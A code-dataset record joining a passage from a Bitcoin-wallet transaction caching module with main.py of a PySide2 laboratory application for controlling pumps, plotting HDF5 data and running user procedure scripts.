(the returned list will always be exactly equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
|
main.py
|
from io import StringIO
from random import randint
import threading
import h5py
import serial
from PySide2.QtCore import QSize, Qt, QAbstractTableModel, Signal, QTimer, QRunnable, Slot, QThreadPool
from PySide2.QtGui import QKeySequence, QSyntaxHighlighter, QTextCharFormat, QPixmap, QImage, QPalette, QColor
from PySide2.QtWebEngineWidgets import QWebEngineView
from PySide2.QtWidgets import QApplication, QMainWindow, QStatusBar, QToolBar, QFileDialog, QTabWidget, QTextEdit, \
QAction
from PySide2.QtWidgets import QVBoxLayout, QScrollArea, QColorDialog, QListWidget, QAbstractItemView, QListWidgetItem
from PySide2.QtWidgets import QLabel, QLineEdit, QGridLayout, QHBoxLayout, QGroupBox, QComboBox, QWidget, QPlainTextEdit
from PySide2.QtWidgets import QMdiArea, QMdiSubWindow, QDockWidget, QTableView, QSizePolicy, QMessageBox, QPushButton
from control_api import PumpMode, Pump, PumpModbusCommandSender, ModbusBuilder, RemoteManger, PortManger
from widgets_builder import NewProjectSetNameDialog, NewTableDialog, ErrorMassage, Label, FileTreeViewer, light, dark
from widgets_builder import CreateNewGraphDialog
from widgets_builder import PumpAbstract, icon, special_characters_detector, StepIncreaseWindow, OpenProjectDialog
import numpy as np
import os
import sys
import pyvisa
import pyqtgraph as pg
MAIN_PROJECTS_SAVED_FILE = "saved_projects"
SUB_MAIN_PROJECTS_SAVED_FILE = ["hsf5-data", 'Graphs', 'Reports', 'Notes', 'Procedure']
if not os.path.exists(MAIN_PROJECTS_SAVED_FILE):
os.mkdir(MAIN_PROJECTS_SAVED_FILE)
class PumpSingleReceiver:
def __init__(self):
self.data = None
self.pump_sender = PumpModbusCommandSender()
self.modbus = ModbusBuilder()
def data_manger(self, parameters):
if parameters['pump_mode'] == PumpMode.DECOUPLED:
if parameters['cmd'] == 'speed':
self.data = self.modbus.build_change_speed(parameters['speed']).get_modbus
elif parameters['cmd'] == 'direction':
self.data = self.modbus.build_flow_direction(parameters['direction']).get_modbus
elif parameters['cmd'] == 'button':
if parameters['button']:
self.data = self.modbus.build_start().get_modbus
else:
self.data = self.modbus.build_stop().get_modbus
port = self.name_filter(parameters['port'])
self.send(port, self.data)
def send(self, send_to, data):
self.pump_sender.send_pump(send_to=send_to, data=data)
def name_filter(self, s):
return s[s.find("(") + 1:-1]
class GraphMaker(QMainWindow):
def __init__(self, title="no title"):
super().__init__()
self.graphWidget = pg.PlotWidget()
self.setCentralWidget(self.graphWidget)
self.graphWidget.setBackground("w")
self.graphWidget.setTitle(title, color="0000", size="10pt")
self.graphWidget.addLegend()
self.graphWidget.showGrid(x=True, y=True)
def plot(self, x_data, y_data, plot_name='no name', color='b', x_axis_name="X Axis", y_axis_name="Y Axis", size=3):
styles = {"color": "0000", "font-size": "20px"}
self.graphWidget.setLabel("left", y_axis_name, **styles)
self.graphWidget.setLabel("bottom", x_axis_name, **styles)
pen = pg.mkPen(color=color, width=size)
self.graphWidget.plot(x_data, y_data, name=plot_name, pen=pen)
class NewGraphAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("New Figure")
self.setStatusTip("Create New Figure")
self.setIcon(icon("line-graph.png"))
self.database = None
self.color = None
self.CreateNewGraphDialog = None
self.triggered.connect(self.new_triggered)
def create_graph(self):
x_data = self.CreateNewGraphDialog.x_dataset_list_QComboBox.currentText()
y_data = self.CreateNewGraphDialog.y_dataset_list_QComboBox.currentText()
title = self.CreateNewGraphDialog.title_QLineEdit.text()
plot_name = self.CreateNewGraphDialog.plot_name_QLineEdit.text()
x_name = self.CreateNewGraphDialog.x_axis_name_QLineEdit.text()
y_name = self.CreateNewGraphDialog.y_axis_name_QLineEdit.text()
size = self.CreateNewGraphDialog.size_QComboBox.value()
if x_data is not None and y_data is not None:
x_data = self.database.get_one_data_set(x_data)
y_data = self.database.get_one_data_set(y_data)
graph = GraphMaker(title)
graph.plot(x_data=x_data, y_data=y_data, color=self.color, plot_name=plot_name, x_axis_name=x_name,
y_axis_name=y_name, size=size)
self.parent().add_sub_win(graph)
self.CreateNewGraphDialog.parent().hide()
def new_triggered(self):
self.CreateNewGraphDialog = CreateNewGraphDialog()
self.CreateNewGraphDialog.select_color_QPushButton.clicked.connect(self.color_dialog)
self.database = DataBase(self.parent().project_name)
self.CreateNewGraphDialog.x_dataset_list_QComboBox.addItems(self.database.get_list_data_set())
self.CreateNewGraphDialog.y_dataset_list_QComboBox.addItems(self.database.get_list_data_set())
self.parent().add_sub_win(self.CreateNewGraphDialog)
self.CreateNewGraphDialog.save_QPushButton.clicked.connect(self.create_graph)
self.CreateNewGraphDialog.cancel_QPushButton.clicked.connect(self.CreateNewGraphDialog.parent().hide)
def color_dialog(self):
self.color = QColorDialog.getColor()
# ser = serial.Serial(port="COM5", baudrate=9600, timeout=1)
def test_generator():
while True:
try:
ser.write(b'g')
yield ser.read(5).decode('ascii')[:-2]
except Exception as e:
print(e)
yield randint(2, 100)
class MonitorWidget(QMainWindow):
def __init__(self):
super().__init__()
self.graphWidget = pg.PlotWidget()
self.setCentralWidget(self.graphWidget)
self.n = 100
self.time_stamp = [0]
self.reading = [0]
self.graphWidget.setBackground("000")
pen = pg.mkPen(color=(255, 0, 0), width=3)
self.plot = self.graphWidget.plot(self.time_stamp, self.reading, pen=pen)
self.timer = QTimer()
self.timer.setInterval(10)
self.timer.timeout.connect(self.update_plot_data)
self.timer.start()
###################
self.data = test_generator()
self.data.__next__()
self.data.__next__()
self.data.__next__()
#############################
def update_plot_data(self):
self.time_stamp.append(self.time_stamp[-1] + 50)
self.reading.append(int(self.data.__next__()))
if len(self.time_stamp) > self.n:
self.time_stamp = self.time_stamp[1:]
self.reading = self.reading[1:]
self.plot.setData(self.time_stamp, self.reading)
class MonitorAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("Monitor")
self.setStatusTip("open monitor")
self.setIcon(icon("line-chart.png"))
self.triggered.connect(self.clicked)
def clicked(self):
self.parent().add_sub_win(MonitorWidget())
class GraphViewer(QMainWindow):
def __init__(self, path):
super().__init__()
self.image_QLabel = QLabel()
self.image_QLabel.setScaledContents(True)
self.image = QImage(path)
self.pixmap = QPixmap(self.image)
self.image_QLabel.setPixmap(self.pixmap.scaled(self.size(), Qt.IgnoreAspectRatio))
self.scrollArea = QScrollArea()
self.scrollArea.setWidget(self.image_QLabel)
zoom_in_QPushButton = QAction(self, "zoom in +", icon=icon('zoom_in.png'))
zoom_in_QPushButton.triggered.connect(self.zoom_in)
zoom_out_QPushButton = QAction(self, "zoom out -", icon=icon('zoom_out.png'))
zoom_out_QPushButton.triggered.connect(self.zoom_out)
toolbar = QToolBar()
toolbar.addAction(zoom_in_QPushButton)
toolbar.addAction(zoom_out_QPushButton)
toolbar.setMovable(False)
self.addToolBar(Qt.LeftToolBarArea, toolbar)
self.setCentralWidget(self.scrollArea)
self.scaleFactor = 1.0
self.zoom_out()
self.zoom_out()
def zoom_in(self):
self.scale_image(1.25)
def zoom_out(self, ):
self.scale_image(0.8)
def scale_image(self, factor):
self.scaleFactor *= factor
self.image_QLabel.resize(self.scaleFactor * self.image_QLabel.pixmap().size())
self.adjust_scrollBar(self.scrollArea.horizontalScrollBar(), factor)
self.adjust_scrollBar(self.scrollArea.verticalScrollBar(), factor)
@staticmethod
def adjust_scrollBar(scrollBar, factor):
scrollBar.setValue(int(factor * scrollBar.value() + ((factor - 1) * scrollBar.pageStep() / 2)))
class OpenGraphAction(QAction):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("Open Figure")
self.setStatusTip("Open Figure")
self.setIcon(icon("line-graph.png"))
self.triggered.connect(self.open_figure)
def open_figure(self):
path = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, self.parent().project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[1])
print(path)
path, _ = QFileDialog.getOpenFileName(None, "Open file", dir=path)
if path:
self.parent().add_sub_win(GraphViewer(path))
class StepFunction(StepIncreaseWindow):
def __init__(self):
super(StepFunction, self).__init__()
def start_it(self):
pass
class StepFunctionAction(QAction):
StepFunctionAddedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
self.setText("step function")
self.setIcon(icon("stepincrease.png"))
self.setStatusTip("step function tool")
self.setParent(parent)
self.triggered.connect(self.clicked)
def clicked(self):
self.parent().add_sub_win(StepFunction())
class Capturing(list):
"stack over flow"
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio
sys.stdout = self._stdout
class TextEditor(QMainWindow):
AddProcedureClickedSignal = Signal(str)
def __init__(self):
super().__init__()
t = """ModbusBuilder = ModbusBuilder()
start = ModbusBuilder.build_start()
stop = ModbusBuilder.build_stop()\n
p = PumpModbusCommandSender()\n
p.send_pump(data=stop, send_to='COM3')"""
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
layout = QGridLayout()
w = QWidget()
w.setLayout(layout)
self.setCentralWidget(w)
self.status = QStatusBar()
self.setStatusBar(self.status)
self.out_put_TextEdit = QTextEdit()
# self.out_put_TextEdit.setMaximumHeight(150)
self.out_put_TextEdit.setReadOnly(True)
self.out_put_TextEdit.setStyleSheet("color: blue;")
self.out_put_TextEdit_dock = CreateDockWindows(title="OutPut", parent=self,
widget=self.out_put_TextEdit,
area=Qt.BottomDockWidgetArea)
self.addDockWidget(Qt.BottomDockWidgetArea, self.out_put_TextEdit_dock)
self.toolbar = QToolBar("main toolbar")
self.toolbar.setIconSize(QSize(16, 16))
self.addToolBar(self.toolbar)
run_action = QAction(icon("play.png"), "Run", self)
run_action.setStatusTip("Run your procedure")
run_action.triggered.connect(self.run)
self.toolbar.addAction(run_action)
self.toolbar.addSeparator()
save_action = QAction(icon("save.png"), "Save", self)
save_action.setStatusTip("Save your procedure")
save_action.triggered.connect(self.procedure_save)
self.toolbar.addAction(save_action)
self.toolbar.addSeparator()
add_action = QAction(icon("add.png"), "Add Procedure", self)
add_action.setStatusTip("Add your procedure to the toolbar")
add_action.triggered.connect(self.add_procedure)
self.toolbar.addAction(add_action)
self.file_name_QLineEdit = QLineEdit()
self.file_name_QLineEdit.setText('procedure.py')
self.file_name_QLabel = QLabel("Procedure Name")
self.procedure_QTextEdit = QTextEdit()
self.procedure_QTextEdit.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
Highlighter(self.procedure_QTextEdit.document())
self.procedure_QTextEdit.append(t)
f = self.font()
f.setFamily('verdana')
f.setPointSize(11)
self.procedure_QTextEdit.setFont(f)
self.procedure_QTextEdit.setStyleSheet("color: black;")
layout.addWidget(self.file_name_QLabel, 0, 0, 1, 1)
layout.addWidget(self.file_name_QLineEdit, 0, 1, 1, 1)
layout.addWidget(self.procedure_QTextEdit, 1, 0, 3, 3)
def error_message(self, s):
dlg = QMessageBox(self)
dlg.setText(s)
dlg.setIcon(QMessageBox.Critical)
dlg.show()
def add_procedure(self):
self.AddProcedureClickedSignal.emit(self.file_name_QLineEdit.text())
def procedure_save(self):
project_name = window.project_name
file_name = self.file_name_QLineEdit.text()
if file_name == "":
file_name = "no_name.py"
elif ".py" not in file_name and len(file_name) > 1:
file_name += '.py'
path = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[4], file_name)
text = self.procedure_QTextEdit.toPlainText()
try:
with open(path, 'w') as f:
f.write(text)
except Exception as e:
self.error_message(str(e))
# self.parent().hide()
def procedure_open(self, path, name):
try:
with open(path) as f:
text = f.read()
except Exception as e:
self.dialog_critical(str(e))
else:
self.procedure_QTextEdit.setPlainText(text)
self.file_name_QLineEdit.setText(name)
def run(self):
def __exc():
try:
self.out_put_TextEdit.setStyleSheet("color: blue;")
with Capturing() as output:
exec(self.procedure_QTextEdit.toPlainText())
for _ in output:
self.out_put_TextEdit.append(str(_))
except Exception as e:
self.out_put_TextEdit.setStyleSheet("color: red;")
self.out_put_TextEdit.append(str(e))
t = threading.Thread(target=__exc)
t.start()
def sizeHint(self):
return QSize(900, 700)
class NewTextEditorAction(QAction):
NewTextEditorAddedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
# self.thread_pool = QThreadPool()
self.setText("New Procedure")
self.setIcon(icon("procedure.png"))
self.setStatusTip("start a new procedure")
self.setParent(parent)
self.triggered.connect(self.clicked)
def clicked(self):
self.parent().add_sub_win(TextEditor())
class Highlighter(QSyntaxHighlighter):
def highlightBlock(self, text):
_format = QTextCharFormat()
# _format.setFontWeight(QFont.Bold)
key_list_1 = ["Return", 'type', 'Parameter', '__init__()', 'False', 'None', 'True', 'and', 'as', 'break',
'class',
'continue', 'float', 'def', 'elif', 'else', 'except', 'finally', 'for', 'from',
'if', 'import', 'in', 'is', 'lambda', 'not', 'or', 'pass', 'raise', 'return',
'try', 'while', 'with', 'not', 'yield', 'str', 'int', 'self', 'range', 'print', ]
key_list_2 = [':', '(', ')', '=', '>', '<', ',',
'!', '/', '"', "."]
key_list_3 = [str(i) for i in range(10)]
for expression in key_list_2 + key_list_1 + key_list_3:
try:
index = text.index(expression)
if expression in key_list_1:
_format.setForeground(Qt.darkMagenta)
elif expression in key_list_2:
_format.setForeground(Qt.red)
elif expression in key_list_3:
_format.setForeground(Qt.blue)
except Exception as e:
str(e)
index = -1
while index >= 0:
length = len(expression)
self.setFormat(index, length, _format)
try:
index = text.index(expression, index + length)
except:
index = -1
class NotePad(QWidget):
def __init__(self):
super().__init__()
layout = QGridLayout()
self.setLayout(layout)
self.note_QPlainTextEdit = QPlainTextEdit()
self.note_name_QLineEdit = QLineEdit()
self.note_name_QLabel = QLabel("Note Name")
layout.addWidget(self.note_name_QLabel, 0, 0, 1, 1)
layout.addWidget(self.note_name_QLineEdit, 0, 1, 1, 1)
layout.addWidget(self.note_QPlainTextEdit, 1, 0, 3, 3)
save_note = QPushButton(icon("save.png"), "Save", self)
save_note.clicked.connect(self.note_save)
cancel_note = QPushButton("Cancel", self)
cancel_note.clicked.connect(lambda: self.parent().close())
layout.addWidget(save_note, 4, 0, 1, 1)
layout.addWidget(cancel_note, 4, 1, 1, 1)
def error_message(self, s):
dlg = QMessageBox(self)
dlg.setText(s)
dlg.setIcon(QMessageBox.Critical)
dlg.show()
def note_save(self):
project_name = window.project_name
note_name = self.note_name_QLineEdit.text()
if note_name == "":
note_name = "no_name"
path = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[3], f"{note_name}.txt")
text = self.note_QPlainTextEdit.toPlainText()
try:
with open(path, 'w') as f:
f.write(text)
except Exception as e:
self.error_message(str(e))
self.parent().hide()
def note_open(self, path, name):
try:
with open(path) as f:
text = f.read()
except Exception as e:
self.dialog_critical(str(e))
else:
self.note_QPlainTextEdit.setPlainText(text)
self.note_name_QLineEdit.setText(name)
class CreateNotePadAction(QAction):
CreateNewNoteClicked = Signal(object)
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.setText("Create New Note")
self.setIcon(icon("note.png"))
self.setStatusTip("Create New Note")
self.triggered.connect(self.clicked)
def clicked(self):
self.CreateNewNoteClicked.emit(NotePad())
class TableModel(QAbstractTableModel):
def __init__(self, data):
super().__init__()
self._data = data
def data(self, index, role):
if role == Qt.DisplayRole:
# Note: self._data[index.row()][index.column()] will also work
value = self._data[index.column(), index.row()]
return str(value)
def rowCount(self, index):
return self._data.shape[1]
def columnCount(self, index):
return self._data.shape[0]
class TableViewer(QMainWindow):
def __init__(self, data=np.array([])):
super().__init__()
self.table = QTableView()
self.model = TableModel(data)
self.table.setModel(self.model)
self.setCentralWidget(self.table)
class CreatNewTableAction(QAction):
NewTableCreatedSignal = Signal(dict)
def __init__(self, parent):
super().__init__()
self.setText("New Table")
self.setStatusTip("Creat a New Table")
self.setIcon(icon("new_table"))
self.NewTableDialog = None
self.triggered.connect(self.show_table_dialog)
self.setParent(parent)
self.database = None
self.data_list = np.array([])
def create_new_table(self):
table_name = self.NewTableDialog.table_name_QLineEdit.text()
for i in range(self.NewTableDialog.dataset_QListWidget.count()):
if self.NewTableDialog.dataset_QListWidget.item(i).checkState() == Qt.Checked:
data = self.database.get_one_data_set(self.NewTableDialog.dataset_QListWidget.item(i).text())
self.data_list.append(data)
self.data_list = np.array(self.data_list)
if special_characters_detector(table_name):
return
self.parent().add_sub_win(TableViewer(data=self.data_list))
# self.NewTableCreatedSignal.emit({"table_name": table_name})
self.NewTableDialog.hide()
def show_table_dialog(self):
self.data_list = []
self.NewTableDialog = NewTableDialog()
self.NewTableDialog.cancel_QPushButton.clicked.connect(self.NewTableDialog.close)
self.NewTableDialog.save_QPushButton.clicked.connect(self.create_new_table)
self.database = DataBase(self.parent().project_name)
self.NewTableDialog.add_list(self.database.get_list_data_set())
self.NewTableDialog.show()
class CreateNewProjectFileTree:
def __init__(self, project_name):
self.project_name = project_name
self.back_dir = os.getcwd()
if not os.path.exists(MAIN_PROJECTS_SAVED_FILE):
os.mkdir(MAIN_PROJECTS_SAVED_FILE)
os.chdir(MAIN_PROJECTS_SAVED_FILE)
def create_dir(self):
if os.path.exists(self.project_name):
ErrorMassage("Name already exist", "this name is already exist\nplease try different name")
os.chdir(self.back_dir)
return False
elif special_characters_detector(self.project_name):
os.chdir(self.back_dir)
return False
else:
for file in SUB_MAIN_PROJECTS_SAVED_FILE:
path = os.path.join(self.project_name, file)
os.makedirs(path)
os.chdir(self.back_dir)
return True
class SCPICommandLine(QWidget):
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
layout = QGridLayout()
self.setLayout(layout)
self.rm = pyvisa.ResourceManager()
a = self.rm.list_resources()
self.pyvisaQLineEdit = QLineEdit()
self.historyQPlainTextEdit = QPlainTextEdit()
self.historyQPlainTextEdit.setReadOnly(True)
# self.historyQPlainTextEdit.setStyleSheet("color: blue;")
self.pyvisa_list_resources_QComboBox = QComboBox()
self.pyvisa_list_resources_QComboBox.addItems(a)
self.pyvisa_list_resources_QComboBox.setFixedSize(80, 20)
layout.addWidget(self.pyvisa_list_resources_QComboBox, 0, 0, 1, 1)
layout.addWidget(self.historyQPlainTextEdit, 1, 0, 2, 2)
layout.addWidget(self.pyvisaQLineEdit, 2, 0, 1, 2)
f = self.font()
f.setFamily('verdana')
f.setPointSize(14)
# f.setWeight(5)
self.pyvisaQLineEdit.setFont(f)
# self.pyvisaQLineEdit.setStyleSheet("color: red;")
self.pyvisaQLineEdit.clear()
# self.setEnabled(False)
self.pyvisaQLineEdit.returnPressed.connect(self.pressed)
def sizeHint(self):
return QSize(1080, 100)
def pressed(self):
# my_instrument = self.rm.open_resource(self.pyvisa_list_resources_QComboBox.currentText())
cmd = self.pyvisaQLineEdit.text()
self.historyQPlainTextEdit.appendPlainText(f'>> {cmd}')
# my_instrument.write(cmd)
self.pyvisaQLineEdit.clear()
class NewProjectAction(QAction):
NewProjectAddedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
self.NewProjectSetNameDialog = NewProjectSetNameDialog()
self.triggered.connect(self.NewProjectSetNameDialog.show)
self.NewProjectSetNameDialog.save_QPushButton.clicked.connect(self.save_project_name_dialog)
self.NewProjectSetNameDialog.cancel_QPushButton.clicked.connect(self.NewProjectSetNameDialog.close)
self.setText("New Project")
self.setIcon(icon("new_project.png"))
self.setStatusTip("start a new project")
self.setParent(parent)
self.setShortcut(QKeySequence("Ctrl+n"))
def save_project_name_dialog(self):
project_name = self.NewProjectSetNameDialog.file_name_QLineEdit.text()
if CreateNewProjectFileTree(project_name).create_dir():
DataBase(project_name).create_new_hdf5_file()
self.NewProjectSetNameDialog.hide()
self.NewProjectAddedSignal.emit(project_name)
class OpenProjectAction(QAction):
OpenProjectActionClickedSignal = Signal(str)
def __init__(self, parent):
super().__init__()
self.setText("Open")
self.setParent(parent)
self.setShortcut(QKeySequence("Ctrl+o"))
self.setIcon(icon("open.png"))
self.setStatusTip("open old project")
self.OpenProjectDialog = OpenProjectDialog()
self.OpenProjectDialog.save_QPushButton.clicked.connect(self.clicked)
self.OpenProjectDialog.cancel_QPushButton.clicked.connect(self.OpenProjectDialog.close)
self.triggered.connect(self.triggered_open)
def triggered_open(self):
self.OpenProjectDialog.project_list_QComboBox.clear()
self.OpenProjectDialog.project_list_QComboBox.addItems(os.listdir('saved_projects'))
self.OpenProjectDialog.show()
def clicked(self):
# file, _ = QFileDialog.getOpenFileName(self.parent(), "Open Project", os.path.join(os.getcwd(),
# MAIN_PROJECTS_SAVED_FILE))
self.OpenProjectActionClickedSignal.emit(self.OpenProjectDialog.project_list_QComboBox.currentText())
self.OpenProjectDialog.hide()
class DataBase:
def __init__(self, project_name):
self.main_file = os.path.join(os.getcwd(), MAIN_PROJECTS_SAVED_FILE, project_name,
SUB_MAIN_PROJECTS_SAVED_FILE[0], f"{project_name}.h5")
def create_new_hdf5_file(self):
with h5py.File(self.main_file, "a") as t:
pass
self.create_new_data_set(name='time stamp', data=np.arange(0, 100))
self.create_new_data_set('voltage_data')
self.create_new_data_set('current_data')
self.create_new_data_set('x_data')
self.create_new_data_set('data2')
self.create_new_data_set('data3', data=np.arange(300, 400) / 100)
# def create_new_table(self, table_name):
#
# class Description(tb.IsDescription):
# time_stamp = tb.Int32Col()
# pump_1_speed = tb.Float64Col()
# pump_2_speed = tb.Float64Col()
# voltage = tb.Float64Col()
# note = tb.StringCol(itemsize=5)
#
# try:
# with tb.open_file(self.main_file, "a") as t:
# a = t.create_table(t.root, table_name, Description)
# # a.append(image)
#
# except tb.exceptions.NodeError:
# return ErrorMassage("Name already exist", "this name is already exist\nplease try different name")
#
def create_new_data_set(self, name, data=np.array(np.random.random(100))):
try:
with h5py.File(self.main_file, "a") as f:
f.create_dataset(name=name, data=data)
except Exception as e:
return ErrorMassage("Error", str(e))
def get_list_data_set(self):
with h5py.File(self.main_file, "a") as f:
return list(f.keys().__iter__())
def get_one_data_set(self, name):
with h5py.File(self.main_file, "a") as f:
return f.get(name)[:]
class DarkModeAction(QAction):
def __init__(self):
super().__init__()
self.setText("DarkMode")
self.setIcon(icon("dark_mode.png"))
self.triggered.connect(self.clicked)
self.setCheckable(True)
@staticmethod
def clicked(s):
if s:
dark(app)
else:
light(app)
class CreateDockWindows(QDockWidget):
def __init__(self, title="No title", parent=None, widget=None, area=None):
super().__init__()
self.setWindowTitle(title)
self.setParent(parent)
self.setAllowedAreas(area)
self.setWidget(widget)
class RemoteAction(QAction):
def __init__(self, parent):
super().__init__()
self.setText("Remote")
self.setStatusTip("start remote connection")
self.setParent(parent)
class RemoteControlPanel(QMainWindow):
def __init__(self, parent):
super().__init__()
self.setParent(parent)
self.RemoteManger = self.parent().RemoteManger
self.ip_QLabel = QLabel("Host IP Address")
self.RemoteManger_ip_addr_QLineEdit = QLineEdit(self.RemoteManger.ip_addr)
self.RemoteManger_ip_addr_QLineEdit.setReadOnly(True)
self.port_QLabel = QLabel("Port")
self.RemoteManger_port_QLineEdit = QLineEdit(str(self.RemoteManger.port))
self.RemoteManger_port_QLineEdit.setReadOnly(True)
self.state_QLabel = QLabel("State")
self.RemoteManger_state_QLineEdit = QLabel(self.RemoteManger.current_state)
# self.RemoteManger_state_QLineEdit.setReadOnly(True)
self.server_listen_QPushButton = QPushButton('listing')
self.server_listen_QPushButton.clicked.connect(self.listing)
self.server_close_QPushButton = QPushButton('close')
self.server_close_QPushButton.clicked.connect(self.close_connection)
layout = QGridLayout()
layout.addWidget(self.ip_QLabel, 0, 0)
layout.addWidget(self.RemoteManger_ip_addr_QLineEdit, 0, 1)
layout.addWidget(self.port_QLabel, 1, 0)
layout.addWidget(self.RemoteManger_port_QLineEdit, 1, 1)
layout.addWidget(self.RemoteManger_state_QLineEdit, 2, 1)
layout.addWidget(self.state_QLabel, 2, 0)
layout.addWidget(self.server_listen_QPushButton, 3, 0)
layout.addWidget(self.server_close_QPushButton, 4, 0)
w = QWidget()
w.setLayout(layout)
self.setCentralWidget(w)
def listing(self):
self.RemoteManger.server_listen()
self.RemoteManger_state_QLineEdit.setText(self.RemoteManger.current_state)
def close_connection(self):
self.RemoteManger.close_connection()
self.RemoteManger_state_QLineEdit.setText(self.RemoteManger.current_state)
class PumpQWidget(QWidget):
PumpSignalSend = Signal(dict)
def __init__(self):
super().__init__()
self.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.remote_conn = False
self.connection_mode_QLabel = QLabel("Pump Connection Mode")
self.connection_mode_QComboBox = QComboBox()
self.connection_mode_QComboBox.addItems(["USB-direct", "Remote"])
self.connection_mode_QComboBox.setDisabled(True)
self.connection_mode_QComboBox.currentTextChanged.connect(self.remote_conn_changed)
# self.PumpModbusCommandSender = PumpModbusCommandSender()
self.pump_mode_state = PumpMode.COUPLED
group_box_pump_mode = QGroupBox("Mode")
self.mode_QLabel = QLabel("Pump Mode")
self.mode_QComboBox = QComboBox()
self.mode_QComboBox.addItems(["coupled", "decoupled"])
self.mode_QComboBox.currentTextChanged.connect(self.pump_mode_changed)
layout_pump_mode = QGridLayout()
layout_pump_mode.addWidget(self.connection_mode_QLabel, 0, 0)
layout_pump_mode.addWidget(self.connection_mode_QComboBox, 0, 1)
layout_pump_mode.addWidget(self.mode_QLabel, 1, 0)
layout_pump_mode.addWidget(self.mode_QComboBox, 1, 1)
group_box_pump_mode.setLayout(layout_pump_mode)
self.pump1 = PumpAbstract("Pump 1")
self.pump1.pump_speed_QDoubleSpinBox.valueChanged.connect(lambda: self.send_to_pump(self.pump1, 'speed'))
self.pump1.pump_direction_QComboBox.currentTextChanged.connect(
lambda: self.send_to_pump(self.pump1, 'direction'))
self.pump1.pump_send_state_QPushButton.clicked.connect(lambda: self.send_to_pump(self.pump1, 'button'))
self.pump2 = PumpAbstract("Pump 2")
self.pump2.pump_speed_QDoubleSpinBox.valueChanged.connect(lambda: self.send_to_pump(self.pump2, 'speed'))
self.pump2.pump_direction_QComboBox.currentTextChanged.connect(
lambda: self.send_to_pump(self.pump2, 'direction'))
self.pump2.pump_send_state_QPushButton.clicked.connect(lambda: self.send_to_pump(self.pump2, 'button'))
self.pump2.setDisabled(True)
g_layout = QGridLayout()
g_layout.addWidget(group_box_pump_mode, 0, 0, 1, 1)
g_layout.addWidget(self.pump1, 1, 0, 2, 1)
g_layout.addWidget(self.pump2, 3, 0, 2, 1)
g_layout.setSpacing(0)
self.setLayout(g_layout)
def sizeHint(self):
return QSize(100, 50)
def pump_mode_changed(self):
if self.mode_QComboBox.currentText() == "coupled":
self.pump2.setDisabled(True)
self.pump_mode_state = PumpMode.COUPLED
else:
self.pump2.setDisabled(False)
self.pump_mode_state = PumpMode.DECOUPLED
def send_to_pump(self, pump, cmd):
parameters = {
'cmd': cmd,
'pump_mode': self.pump_mode_state,
'port': pump.pump_port_selection_QComboBox.currentText(),
'speed': pump.pump_speed_QDoubleSpinBox.value(),
'direction': pump.pump_direction_QComboBox.currentText(),
'button': pump.pump_send_state_QPushButton.isChecked()
}
self.PumpSignalSend.emit(parameters)
def remote_conn_changed(self):
usb_ports = PortManger().get_ports_list
self.pump1.pump_port_selection_QComboBox.clear()
self.pump2.pump_port_selection_QComboBox.clear()
if self.connection_mode_QComboBox.currentText() == "Remote":
s = self.parent().parent().RemoteManger
if s is not None:
try:
self.pump1.pump_port_selection_QComboBox.addItems(s.get_ports_list())
self.pump2.pump_port_selection_QComboBox.addItems(s.get_ports_list())
except Exception as e:
ErrorMassage("Error", e)
elif self.connection_mode_QComboBox.currentText() == "USB-direct":
self.pump1.pump_port_selection_QComboBox.addItems(usb_ports)
self.pump2.pump_port_selection_QComboBox.addItems(usb_ports)
class HelpAction(QAction):
def __init__(self, parent):
super().__init__()
self.setText("Help")
self.setParent(parent)
self.setStatusTip("Need Help")
self.triggered.connect(self.clicked)
self.setShortcut(QKeySequence("Ctrl+h"))
def clicked(self):
self.parent().add_sub_win(HelpDialog())
class HelpDialog(QMainWindow):
